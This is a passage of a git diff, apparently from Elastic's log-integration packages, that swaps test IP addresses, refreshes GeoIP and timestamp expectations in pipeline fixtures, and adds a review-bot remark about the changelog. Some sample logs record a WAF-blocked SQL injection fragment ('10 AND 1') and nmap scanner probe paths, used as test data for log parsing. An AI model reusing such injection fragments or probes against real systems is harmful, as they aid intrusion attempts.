@@ -368,8 +386,8 @@ }, "event": { "action": "BLOCK", - "ingested": "2021-10-11T15:00:35.544818361Z", - "original": "{\"timestamp\":1576280412771,\"formatVersion\":1,\"webaclId\":\"arn:aws:wafv2:ap-southeast-2:12345:regional/webacl/test/111\",\"terminatingRuleId\":\"STMTest_SQLi_XSS\",\"terminatingRuleType\":\"REGULAR\",\"action\":\"BLOCK\",\"terminatingRuleMatchDetails\":[{\"conditionType\":\"SQL_INJECTION\",\"location\":\"UNKNOWN\",\"matchedData\":[\"10\",\"AND\",\"1\"]}],\"httpSourceName\":\"ALB\",\"httpSourceId\":\"alb\",\"ruleGroupList\":[],\"rateBasedRuleList\":[],\"nonTerminatingMatchingRules\":[],\"requestHeadersInserted\":null,\"responseCodeSent\":null,\"httpRequest\":{\"clientIp\":\"1.1.1.1\",\"country\":\"AU\",\"headers\":[],\"uri\":\"\",\"args\":\"\",\"httpVersion\":\"HTTP/1.1\",\"httpMethod\":\"POST\",\"requestId\":\"null\"},\"labels\":[{\"name\":\"value\"}]}", + "ingested": "2021-12-09T16:12:01.711639Z", + "original": "{\"timestamp\":1576280412771,\"formatVersion\":1,\"webaclId\":\"arn:aws:wafv2:ap-southeast-2:12345:regional/webacl/test/111\",\"terminatingRuleId\":\"STMTest_SQLi_XSS\",\"terminatingRuleType\":\"REGULAR\",\"action\":\"BLOCK\",\"terminatingRuleMatchDetails\":[{\"conditionType\":\"SQL_INJECTION\",\"location\":\"UNKNOWN\",\"matchedData\":[\"10\",\"AND\",\"1\"]}],\"httpSourceName\":\"ALB\",\"httpSourceId\":\"alb\",\"ruleGroupList\":[],\"rateBasedRuleList\":[],\"nonTerminatingMatchingRules\":[],\"requestHeadersInserted\":null,\"responseCodeSent\":null,\"httpRequest\":{\"clientIp\":\"89.160.20.156\",\"country\":\"AU\",\"headers\":[],\"uri\":\"\",\"args\":\"\",\"httpVersion\":\"HTTP/1.1\",\"httpMethod\":\"POST\",\"requestId\":\"null\"},\"labels\":[{\"name\":\"value\"}]}", "category": "web", "type": [ "access", diff --git a/packages/aws/manifest.yml b/packages/aws/manifest.yml index 67df81b208f..c84f9a46679 100644 --- a/packages/aws/manifest.yml +++ b/packages/aws/manifest.yml 
@@ -1,7 +1,7 @@ format_version: 1.0.0 name: aws title: AWS -version: 1.6.1 +version: 1.6.2 license: basic description: Collect logs and metrics from Amazon Web Services with Elastic Agent. type: integration diff --git a/packages/azure/changelog.yml b/packages/azure/changelog.yml index 2d3f1a1361e..78e15e8ce5f 100644 --- a/packages/azure/changelog.yml +++ b/packages/azure/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.12.1" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "0.12.0" changes: - description: Release azure package for v8.0.0 diff --git a/packages/azure/data_stream/activitylogs/_dev/test/pipeline/test-activitylogs-edgecases.log-expected.json b/packages/azure/data_stream/activitylogs/_dev/test/pipeline/test-activitylogs-edgecases.log-expected.json index ddc1b7fd158..3807df486fa 100644 --- a/packages/azure/data_stream/activitylogs/_dev/test/pipeline/test-activitylogs-edgecases.log-expected.json +++ b/packages/azure/data_stream/activitylogs/_dev/test/pipeline/test-activitylogs-edgecases.log-expected.json @@ -13,7 +13,7 @@ }, "event": { "action": "Microsoft.Resourcehealth/healthevent/Updated/action", - "ingested": "2021-06-14T09:02:47.229627300Z", + "ingested": "2021-12-09T13:30:56.909152600Z", "original": "{\"category\":\"ResourceHealth\",\"correlationId\":\"1c867fe2-050c-4a74-bb1c-a83b15246fdd\",\"level\":\"Information\",\"operationName\":\"Microsoft.Resourcehealth/healthevent/Updated/action\",\"properties\":{\"eventCategory\":\"ResourceHealth\",\"eventProperties\":{\"cause\":\"PlatformInitiated\"}},\"resourceId\":\"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.domainRegistration\",\"resultType\":\"Updated\",\"time\":\"2021-05-25T22:04:07.22Z\"}", "kind": "event" }, 
diff --git a/packages/azure/data_stream/activitylogs/_dev/test/pipeline/test-activitylogs-raw.log b/packages/azure/data_stream/activitylogs/_dev/test/pipeline/test-activitylogs-raw.log
index 0f46c761819..d5c8c1930cd 100644
--- a/packages/azure/data_stream/activitylogs/_dev/test/pipeline/test-activitylogs-raw.log
+++ b/packages/azure/data_stream/activitylogs/_dev/test/pipeline/test-activitylogs-raw.log
@@ -1 +1 @@
-{"callerIpAddress":"51.251.141.41","category":"Action","correlationId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","durationMs":0,"identity":{"authorization":{"action":"Microsoft.EventHub/namespaces/authorizationRules/listKeys/action","evidence":{"principalId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","principalType":"ServicePrincipal","role":"Azure EventGrid Service BuiltIn Role","roleAssignmentId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","roleAssignmentScope":"/subscriptions/8a4de8b5-095c-47d0-a96f-a75130c61d53","roleDefinitionId":"8a4de8b5-095c-47d0-a96f-a75130c61d53"},"scope":"/subscriptions/8a4de8b5-095c-47d0-a96f-a75130c61d53/resourceGroups/sa-hem/providers/Microsoft.EventHub/namespaces/azurelsevents/authorizationRules/RootManageSharedAccessKey"},"claims":{"aio":"8a4de8b5-095c-47d0-a96f-a75130c61d53","appid":"8a4de8b5-095c-47d0-a96f-a75130c61d53","appidacr":"2","aud":"https://management.core.windows.net/","exp":"1571904826","http://schemas.microsoft.com/identity/claims/identityprovider":"https://sts.windows.net/8a4de8b5-095c-47d0-a96f-a75130c61d53/","http://schemas.microsoft.com/identity/claims/objectidentifier":"8a4de8b5-095c-47d0-a96f-a75130c61d53","http://schemas.microsoft.com/identity/claims/tenantid":"8a4de8b5-095c-47d0-a96f-a75130c61d53","http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier":"8a4de8b5-095c-47d0-a96f-a75130c61d53","iat":"1571875726","iss":"https://sts.windows.net/8a4de8b5-095c-47d0-a96f-a75130c61d53/","nbf":"1571875726","uti":"8a4de8b5-095c-47d0-a96f-a75130c61d53","ver":"1.0"}},"level":"Information","location":"global","operationName":"MICROSOFT.EVENTHUB/NAMESPACES/AUTHORIZATIONRULES/LISTKEYS/ACTION","resourceId":"/SUBSCRIPTIONS/8a4de8b5-095c-47d0-a96f-a75130c61d53/RESOURCEGROUPS/SA-HEMA/PROVIDERS/MICROSOFT.EVENTHUB/NAMESPACES/AZURELSEVENTS/AUTHORIZATIONRULES/ROOTMANAGESHAREDACCESSKEY","resultSignature":"Started.","resultType":"Start","time":"2019-10-24T00:13:46.3554259Z"}
\ No newline at end of file
+{"callerIpAddress":"81.2.69.144","category":"Action","correlationId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","durationMs":0,"identity":{"authorization":{"action":"Microsoft.EventHub/namespaces/authorizationRules/listKeys/action","evidence":{"principalId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","principalType":"ServicePrincipal","role":"Azure EventGrid Service BuiltIn Role","roleAssignmentId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","roleAssignmentScope":"/subscriptions/8a4de8b5-095c-47d0-a96f-a75130c61d53","roleDefinitionId":"8a4de8b5-095c-47d0-a96f-a75130c61d53"},"scope":"/subscriptions/8a4de8b5-095c-47d0-a96f-a75130c61d53/resourceGroups/sa-hem/providers/Microsoft.EventHub/namespaces/azurelsevents/authorizationRules/RootManageSharedAccessKey"},"claims":{"aio":"8a4de8b5-095c-47d0-a96f-a75130c61d53","appid":"8a4de8b5-095c-47d0-a96f-a75130c61d53","appidacr":"2","aud":"https://management.core.windows.net/","exp":"1571904826","http://schemas.microsoft.com/identity/claims/identityprovider":"https://sts.windows.net/8a4de8b5-095c-47d0-a96f-a75130c61d53/","http://schemas.microsoft.com/identity/claims/objectidentifier":"8a4de8b5-095c-47d0-a96f-a75130c61d53","http://schemas.microsoft.com/identity/claims/tenantid":"8a4de8b5-095c-47d0-a96f-a75130c61d53","http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier":"8a4de8b5-095c-47d0-a96f-a75130c61d53","iat":"1571875726","iss":"https://sts.windows.net/8a4de8b5-095c-47d0-a96f-a75130c61d53/","nbf":"1571875726","uti":"8a4de8b5-095c-47d0-a96f-a75130c61d53","ver":"1.0"}},"level":"Information","location":"global","operationName":"MICROSOFT.EVENTHUB/NAMESPACES/AUTHORIZATIONRULES/LISTKEYS/ACTION","resourceId":"/SUBSCRIPTIONS/8a4de8b5-095c-47d0-a96f-a75130c61d53/RESOURCEGROUPS/SA-HEMA/PROVIDERS/MICROSOFT.EVENTHUB/NAMESPACES/AZURELSEVENTS/AUTHORIZATIONRULES/ROOTMANAGESHAREDACCESSKEY","resultSignature":"Started.","resultType":"Start","time":"2019-10-24T00:13:46.3554259Z"}
\ No newline at end of file
diff --git a/packages/azure/data_stream/activitylogs/_dev/test/pipeline/test-activitylogs-raw.log-expected.json b/packages/azure/data_stream/activitylogs/_dev/test/pipeline/test-activitylogs-raw.log-expected.json index f52fea5c8e5..14d6f56a662 100644 --- a/packages/azure/data_stream/activitylogs/_dev/test/pipeline/test-activitylogs-raw.log-expected.json +++ b/packages/azure/data_stream/activitylogs/_dev/test/pipeline/test-activitylogs-raw.log-expected.json @@ -7,26 +7,38 @@ "source": { "geo": { "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -0.1224, - "lat": 51.4964 - }, - "country_iso_code": "GB" + "lon": -1.3614, + "lat": 51.7095 + } + }, + "as": { + "number": 20712, + "organization": { + "name": "Andrews \u0026 Arnold Ltd" + } }, - "ip": "51.251.141.41" + "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" ], "geo": { "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -0.1224, - "lat": 51.4964 - }, - "country_iso_code": "GB" + "lon": -1.3614, + "lat": 51.7095 + } }, "cloud": { "provider": "azure" 
@@ -37,17 +49,17 @@ }, "related": { "ip": [ - "51.251.141.41" + "81.2.69.144" ] }, "client": { - "ip": "51.251.141.41" + "ip": "81.2.69.144" }, "event": { "duration": 0, "action": "MICROSOFT.EVENTHUB/NAMESPACES/AUTHORIZATIONRULES/LISTKEYS/ACTION", - "ingested": "2021-06-14T09:02:47.279653200Z", - "original": "{\"callerIpAddress\":\"51.251.141.41\",\"category\":\"Action\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"durationMs\":0,\"identity\":{\"authorization\":{\"action\":\"Microsoft.EventHub/namespaces/authorizationRules/listKeys/action\",\"evidence\":{\"principalId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"principalType\":\"ServicePrincipal\",\"role\":\"Azure EventGrid Service BuiltIn Role\",\"roleAssignmentId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"roleAssignmentScope\":\"/subscriptions/8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"roleDefinitionId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\"},\"scope\":\"/subscriptions/8a4de8b5-095c-47d0-a96f-a75130c61d53/resourceGroups/sa-hem/providers/Microsoft.EventHub/namespaces/azurelsevents/authorizationRules/RootManageSharedAccessKey\"},\"claims\":{\"aio\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"appid\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"appidacr\":\"2\",\"aud\":\"https://management.core.windows.net/\",\"exp\":\"1571904826\",\"http://schemas.microsoft.com/identity/claims/identityprovider\":\"https://sts.windows.net/8a4de8b5-095c-47d0-a96f-a75130c61d53/\",\"http://schemas.microsoft.com/identity/claims/objectidentifier\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"http://schemas.microsoft.com/identity/claims/tenantid\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"iat\":\"1571875726\",\"iss\":\"https://sts.windows.net/8a4de8b5-095c-47d0-a96f-a75130c61d53/\",\"nbf\":\"1571875726\",\"uti\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"ver\":\"1.0\"}},\"level\":\"Information\",\"location\":\"g
lobal\",\"operationName\":\"MICROSOFT.EVENTHUB/NAMESPACES/AUTHORIZATIONRULES/LISTKEYS/ACTION\",\"resourceId\":\"/SUBSCRIPTIONS/8a4de8b5-095c-47d0-a96f-a75130c61d53/RESOURCEGROUPS/SA-HEMA/PROVIDERS/MICROSOFT.EVENTHUB/NAMESPACES/AZURELSEVENTS/AUTHORIZATIONRULES/ROOTMANAGESHAREDACCESSKEY\",\"resultSignature\":\"Started.\",\"resultType\":\"Start\",\"time\":\"2019-10-24T00:13:46.3554259Z\"}", + "ingested": "2021-12-09T13:30:56.983745700Z", + "original": "{\"callerIpAddress\":\"81.2.69.144\",\"category\":\"Action\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"durationMs\":0,\"identity\":{\"authorization\":{\"action\":\"Microsoft.EventHub/namespaces/authorizationRules/listKeys/action\",\"evidence\":{\"principalId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"principalType\":\"ServicePrincipal\",\"role\":\"Azure EventGrid Service BuiltIn Role\",\"roleAssignmentId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"roleAssignmentScope\":\"/subscriptions/8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"roleDefinitionId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\"},\"scope\":\"/subscriptions/8a4de8b5-095c-47d0-a96f-a75130c61d53/resourceGroups/sa-hem/providers/Microsoft.EventHub/namespaces/azurelsevents/authorizationRules/RootManageSharedAccessKey\"},\"claims\":{\"aio\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"appid\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"appidacr\":\"2\",\"aud\":\"https://management.core.windows.net/\",\"exp\":\"1571904826\",\"http://schemas.microsoft.com/identity/claims/identityprovider\":\"https://sts.windows.net/8a4de8b5-095c-47d0-a96f-a75130c61d53/\",\"http://schemas.microsoft.com/identity/claims/objectidentifier\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"http://schemas.microsoft.com/identity/claims/tenantid\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"iat\":\"1571875726\",\"iss\":\"https://sts.windows.net/8a4de8b5-095c-47d0-a96f-a75130c
61d53/\",\"nbf\":\"1571875726\",\"uti\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"ver\":\"1.0\"}},\"level\":\"Information\",\"location\":\"global\",\"operationName\":\"MICROSOFT.EVENTHUB/NAMESPACES/AUTHORIZATIONRULES/LISTKEYS/ACTION\",\"resourceId\":\"/SUBSCRIPTIONS/8a4de8b5-095c-47d0-a96f-a75130c61d53/RESOURCEGROUPS/SA-HEMA/PROVIDERS/MICROSOFT.EVENTHUB/NAMESPACES/AZURELSEVENTS/AUTHORIZATIONRULES/ROOTMANAGESHAREDACCESSKEY\",\"resultSignature\":\"Started.\",\"resultType\":\"Start\",\"time\":\"2019-10-24T00:13:46.3554259Z\"}", "type": [ "change" ], diff --git a/packages/azure/data_stream/activitylogs/fields/ecs.yml b/packages/azure/data_stream/activitylogs/fields/ecs.yml index d259ad88592..1839a0db982 100644 --- a/packages/azure/data_stream/activitylogs/fields/ecs.yml +++ b/packages/azure/data_stream/activitylogs/fields/ecs.yml @@ -72,6 +72,10 @@ external: ecs - name: geo.city_name external: ecs +- name: geo.region_name + external: ecs +- name: geo.region_iso_code + external: ecs - name: log.level external: ecs - name: source.geo.city_name diff --git a/packages/azure/data_stream/auditlogs/_dev/test/pipeline/test-auditlogs-raw.log-expected.json b/packages/azure/data_stream/auditlogs/_dev/test/pipeline/test-auditlogs-raw.log-expected.json index 313a44ca977..cf3e1022d17 100644 --- a/packages/azure/data_stream/auditlogs/_dev/test/pipeline/test-auditlogs-raw.log-expected.json +++ b/packages/azure/data_stream/auditlogs/_dev/test/pipeline/test-auditlogs-raw.log-expected.json 
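Review bot: The two definitions added to activitylogs `fields/ecs.yml` for top-level `geo.region_name` and `geo.region_iso_code` are a mapping change, yet the azure changelog entry in this same change only describes a test-IP swap as a bugfix. The expected output shows the pipeline copying the whole `source.geo` object to top-level `geo`, so whatever region and city fields the GeoIP database returns land there; only `source.geo.city_name` is visible as context, so whether `source.geo.region_name` and `source.geo.region_iso_code` are also declared cannot be confirmed from this hunk. I would state the mapping addition in the changelog, e.g. `- description: Add geo.region_name and geo.region_iso_code field definitions to activitylogs`, and check that the `source.geo.region_*` pair is declared too.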
@@ -14,7 +14,7 @@ "event": { "duration": 0, "action": "Update device", - "ingested": "2021-06-14T09:02:47.682701100Z", + "ingested": "2021-12-09T13:30:57.501235200Z", "original": "{\"category\":\"AuditLogs\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"durationMs\":0,\"identity\":\"Device Registration Service\",\"level\":\"Informational\",\"operationName\":\"Update device\",\"operationVersion\":\"1.0\",\"properties\":{\"activityDateTime\":\"2019-10-18T15:30:51.0273716+00:00\",\"activityDisplayName\":\"Update device\",\"category\":\"Device\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"id\":\"Directory_ESQ\",\"initiatedBy\":{\"app\":{\"appId\":\"id\",\"displayName\":\"Device Registration Service\",\"servicePrincipalId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"servicePrincipalName\":\"Core\"}},\"loggedByService\":\"Core Directory\",\"operationType\":\"Update\",\"result\":\"success\",\"resultReason\":\"\",\"targetResources\":[{\"displayName\":\"LAPTOP-12\",\"id\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"modifiedProperties\":[{\"displayName\":\"Included Updated Properties\",\"newValue\":\"\\\"\\\"\",\"oldValue\":\"\"}],\"type\":\"Device\"}]},\"resourceId\":\"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam\",\"resultSignature\":\"None\",\"tenantId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"time\":\"2019-10-18T15:30:51.0273716Z\"}", "kind": "event", "outcome": "success" diff --git a/packages/azure/data_stream/eventhub/_dev/test/pipeline/test-eventhub-raw.log-expected.json b/packages/azure/data_stream/eventhub/_dev/test/pipeline/test-eventhub-raw.log-expected.json index a3c466524c5..bf1e67974ba 100644 --- a/packages/azure/data_stream/eventhub/_dev/test/pipeline/test-eventhub-raw.log-expected.json +++ b/packages/azure/data_stream/eventhub/_dev/test/pipeline/test-eventhub-raw.log-expected.json 
@@ -4,10 +4,11 @@ "ecs": { "version": "1.12.0" }, + "message": "{\"category\":\"AuditLogs\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"durationMs\":0,\"identity\":\"Device Registration Service\",\"level\":\"Informational\",\"operationName\":\"Update device\",\"operationVersion\":\"1.0\",\"properties\":{\"activityDateTime\":\"2019-10-18T15:30:51.0273716+00:00\",\"activityDisplayName\":\"Update device\",\"category\":\"Device\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"id\":\"Directory_ESQ\",\"initiatedBy\":{\"app\":{\"appId\":\"id\",\"displayName\":\"Device Registration Service\",\"servicePrincipalId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"servicePrincipalName\":\"Core\"}},\"loggedByService\":\"Core Directory\",\"operationType\":\"Update\",\"result\":\"success\",\"resultReason\":\"\",\"targetResources\":[{\"displayName\":\"LAPTOP-12\",\"id\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"modifiedProperties\":[{\"displayName\":\"Included Updated Properties\",\"newValue\":\"\\\"\\\"\",\"oldValue\":\"\"}],\"type\":\"Device\"}]},\"resourceId\":\"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam\",\"resultSignature\":\"None\",\"tenantId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"time\":\"2019-10-18T15:30:51.0273716Z\"}", "event": { + "ingested": "2021-12-09T13:30:57.966322200Z", "kind": "event" }, - "message": "{\"category\":\"AuditLogs\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"durationMs\":0,\"identity\":\"Device Registration Service\",\"level\":\"Informational\",\"operationName\":\"Update device\",\"operationVersion\":\"1.0\",\"properties\":{\"activityDateTime\":\"2019-10-18T15:30:51.0273716+00:00\",\"activityDisplayName\":\"Update device\",\"category\":\"Device\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"id\":\"Directory_ESQ\",\"initiatedBy\":{\"app\":{\"appId\":\"id\",\"displayName\":\"Device Registration 
Service\",\"servicePrincipalId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"servicePrincipalName\":\"Core\"}},\"loggedByService\":\"Core Directory\",\"operationType\":\"Update\",\"result\":\"success\",\"resultReason\":\"\",\"targetResources\":[{\"displayName\":\"LAPTOP-12\",\"id\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"modifiedProperties\":[{\"displayName\":\"Included Updated Properties\",\"newValue\":\"\\\"\\\"\",\"oldValue\":\"\"}],\"type\":\"Device\"}]},\"resourceId\":\"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam\",\"resultSignature\":\"None\",\"tenantId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"time\":\"2019-10-18T15:30:51.0273716Z\"}", "tags": [ "preserve_original_event" ] diff --git a/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-invalid-raw.log-expected.json b/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-invalid-raw.log-expected.json index 0d9725fd5f3..17cd84347c1 100644 --- a/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-invalid-raw.log-expected.json +++ b/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-invalid-raw.log-expected.json 
@@ -10,7 +10,7 @@ }, "event": { "action": "ApplicationGatewayAccess", - "ingested": "2021-06-14T09:02:47.887108Z", + "ingested": "2021-12-09T13:30:58.364774600Z", "original": "{ \"resourceId\": \"/SUBSCRIPTIONS/SUBSCRIPTION/RESOURCEGROUPS/ET-AZURE-INTEGRATION-TESTING/PROVIDERS/MICROSOFT.NETWORK/APPLICATIONGATEWAYS/LANGERGATEWAY\", \"operationName\": \"ApplicationGatewayAccess\", \"time\": \"2020-10-11T20:30:59Z\", \"category\": \"ApplicationGatewayAccessLog\", \"properties\": {\"instanceId\":\"ApplicationGatewayRole_IN_1\",\"clientIP\":\"172.105.13.165\",\"clientPort\":18234,\"httpMethod\":\"GET\",\"requestUri\":\"/nmaplowercheck1602448229\",\"requestQuery\":\"X-AzureApplicationGateway-CACHE-HIT=0\",\"userAgent\":\"Mozilla/5.0\",\"httpStatus\":502,\"httpVersion\":\"HTTP/1.1\",\"receivedBytes\":108,\"sentBytes\":1636,\"timeTaken\":78,\"sslEnabled\":\"off\",\"host\":\"IP\",\"originalHost\":\"IP\"}},{ \"resourceId\": \"/SUBSCRIPTIONS/SUBSCRIPTION/RESOURCEGROUPS/ET-AZURE-INTEGRATION-TESTING/PROVIDERS/MICROSOFT.NETWORK/APPLICATIONGATEWAYS/LANGERGATEWAY\", \"operationName\": \"ApplicationGatewayAccess\", \"time\": \"2020-10-11T20:30:59Z\", \"category\": \"ApplicationGatewayAccessLog\", \"properties\": {\"instanceId\":\"ApplicationGatewayRole_IN_1\",\"clientIP\":\"172.105.13.165\",\"clientPort\":18706,\"httpMethod\":\"GET\",\"requestUri\":\"/evox/about\",\"requestQuery\":\"X-AzureApplicationGateway-CACHE-HIT=0\",\"userAgent\":\"Mozilla/5.0\",\"httpStatus\":502,\"httpVersion\":\"HTTP/1.1\",\"receivedBytes\":94,\"sentBytes\":1636,\"timeTaken\":62,\"sslEnabled\":\"off\",\"host\":\"IP\",\"originalHost\":\"IP\"}}]}", "kind": "event" }, diff --git a/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-kube.log-expected.json b/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-kube.log-expected.json index b0cebb8e372..992b7187041 100644 
--- a/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-kube.log-expected.json +++ b/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-kube.log-expected.json @@ -10,7 +10,7 @@ }, "event": { "action": "Microsoft.ContainerService/managedClusters/diagnosticLogs/Read", - "ingested": "2021-06-14T09:02:47.903575800Z", + "ingested": "2021-12-09T13:30:58.413839200Z", "original": "{\"Cloud\":\"AzureCloud\",\"Environment\":\"prod\",\"category\":\"kube-audit\",\"ccpNamespace\":\"5e4bf4baee195b00017cdbfa\",\"operationName\":\"Microsoft.ContainerService/managedClusters/diagnosticLogs/Read\",\"properties\":{\"log\":\"{\\\"kind\\\":\\\"Event\\\"}\",\"pod\":\"kube-apiserver-666bd4b459-hjgdc\"},\"resourceId\":\"/SUBSCRIPTIONS/70BD6E77-4B1E-4835-8896-DB77B8EEF364/RESOURCEGROUPS/OBS-INFRASTRUCTURE/PROVIDERS/MICROSOFT.CONTAINERSERVICE/MANAGEDCLUSTERS/OBSKUBE\",\"time\":\"2020-11-09T10:57:31.0000000Z\"}", "kind": "event" }, diff --git a/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-raw.log-expected.json b/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-raw.log-expected.json index 7874bbc8ca6..7b7dd9ec56c 100644 --- a/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-raw.log-expected.json +++ b/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-raw.log-expected.json 
@@ -11,7 +11,7 @@ }, "event": { "action": "Retreive ConsumerGroup", - "ingested": "2021-06-14T09:02:47.924002Z", + "ingested": "2021-12-09T13:30:58.470556500Z", "original": "{\"ActivityId\":\"30ed877c-a36b-491a-bd4d-ddd847fe55b8\",\"Caller\":\"Portal\",\"Environment\":\"PROD\",\"EventName\":\"Retreive ConsumerGroup\",\"EventProperties\":\"{\\\"SubscriptionId\\\":\\\"7657426d-c4c3-44ac-88a2-3b2cd59e6dba\\\",\\\"Namespace\\\":\\\"obstesteventhubs\\\",\\\"Via\\\":\\\"sb://obstesteventhubs.servicebus.windows.net/insights-logs-operationallogs/consumergroups?api-version=2017-04\\u0026$skip=0\\u0026$top=100\\\",\\\"TrackingId\\\":\\\"30ed877c-a36b-491a-bd4d-ddd847fe55b8_M2CH3_M2CH3_G3S2\\\"}\",\"EventTimeString\":\"11/3/2020 9:06:42 AM +00:00\",\"Region\":\"West Europe\",\"ScaleUnit\":\"PROD-AM3-AZ501\",\"Status\":\"Succeeded\",\"category\":\"OperationalLogs\",\"resourceId\":\"/SUBSCRIPTIONS/7657426D-C4C3-44AC-88A2-3B2CD59E6DBA/RESOURCEGROUPS/OBS-TEST/PROVIDERS/MICROSOFT.EVENTHUB/NAMESPACES/OBSTESTEVENTHUBS\"}", "kind": "event", "outcome": "succeeded" @@ -56,7 +56,7 @@ }, "event": { "action": "Retreive ConsumerGroup", - "ingested": "2021-06-14T09:02:47.924023Z", + "ingested": "2021-12-09T13:30:58.470564700Z", "original": "{\"ActivityId\":\"30ed877c-a36b-491a-bd4d-ddd847fe55b8\",\"Caller\":\"Portal\",\"Environment\":\"PROD\",\"EventName\":\"Retreive ConsumerGroup\",\"EventProperties\":\"{\\\"SubscriptionId\\\":\\\"7657426d-c4c3-44ac-88a2-3b2cd59e6dba\\\",\\\"Namespace\\\":\\\"obstesteventhubs\\\"}\",\"EventTimeString\":\"11/3/2020 9:06:42 AM +00:00\",\"Region\":\"West Europe\",\"ScaleUnit\":\"PROD-AM3-AZ501\",\"Status\":\"Succeeded\",\"category\":\"OperationalLogs\",\"resourceId\":\"/SUBSCRIPTIONS/7657426D-C4C3-44AC-88A2-3B2CD59E6DBA/RESOURCEGROUPS/OBS-TEST/PROVIDERS/MICROSOFT.EVENTHUB/NAMESPACES/OBSTESTEVENTHUBS\"}", "kind": "event", "outcome": "succeeded" 
diff --git a/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-remote-raw.log-expected.json b/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-remote-raw.log-expected.json index f5657cea1a9..25ab37c8c0a 100644 --- a/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-remote-raw.log-expected.json +++ b/packages/azure/data_stream/platformlogs/_dev/test/pipeline/test-platformlogs-remote-raw.log-expected.json @@ -10,7 +10,7 @@ }, "event": { "action": "Microsoft.ContainerService/managedClusters/diagnosticLogs/Read", - "ingested": "2021-06-14T09:02:47.965542200Z", + "ingested": "2021-12-09T13:30:58.573546900Z", "original": 